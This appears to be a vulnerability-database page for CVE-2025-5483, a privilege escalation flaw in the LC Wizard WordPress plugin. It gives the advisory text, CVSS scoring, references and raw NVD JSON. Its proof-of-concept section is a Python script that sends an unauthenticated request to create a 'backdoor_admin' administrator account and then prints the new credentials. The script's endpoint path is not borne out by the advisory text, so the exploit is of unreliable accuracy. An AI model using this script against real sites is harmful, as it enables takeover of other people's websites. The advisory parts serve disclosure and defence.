CVE-2025-5483

Description

The LC Wizard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check in the ghl-wizard/inc/wp_user.php file in versions 1.2.10 to 1.3.0. This makes it possible for unauthenticated attackers to create new user accounts with the administrator role when the PRO functionality is enabled.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

LC Wizard plugin for WordPress 1.2.10

LC Wizard plugin for WordPress 1.2.11

LC Wizard plugin for WordPress 1.2.12

LC Wizard plugin for WordPress 1.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-5483 PoC - LC Wizard Plugin Privilege Escalation # Affected versions: 1.2.10 to 1.3.0 # Target: WordPress with LC Wizard plugin (PRO mode enabled) import requests import json target_url = "http://target-wordpress-site.com" # Step 1: Identify vulnerable endpoint vulnerable_endpoint = f"{target_url}/wp-json/ghl-wizard/v1/create-user" # Step 2: Construct malicious request to create admin user payload = { "username": "backdoor_admin", "email": "[email protected]", "password": "P@ssw0rd123!", "role": "administrator" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } # Step 3: Send unauthenticated request response = requests.post( vulnerable_endpoint, json=payload, headers=headers, timeout=10 ) # Step 4: Verify account creation if response.status_code == 200 or response.status_code == 201: print("[+] Administrator account created successfully!") print(f"[+] Username: {payload['username']}") print(f"[+] Password: {payload['password']}") else: print(f"[-] Request failed with status: {response.status_code}") print(f"[-] Response: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-5483
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-5483
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-5483/
[4] VulDB https://vuldb.com/cve/CVE-2025-5483
[5] https://plugins.trac.wordpress.org/changeset/3366906
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/42dcc302-b543-42c7-99fa-605f017beb1a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-5483", "sourceIdentifier": "[email protected]", "published": "2025-11-07T04:15:46.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LC Wizard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check in the ghl-wizard/inc/wp_user.php file in versions 1.2.10 to 1.3.0. This makes it possible for unauthenticated attackers to create new user accounts with the administrator role when the PRO functionality is enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3366906", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/42dcc302-b543-42c7-99fa-605f017beb1a?source=cve", "source": "[email protected]"}]}}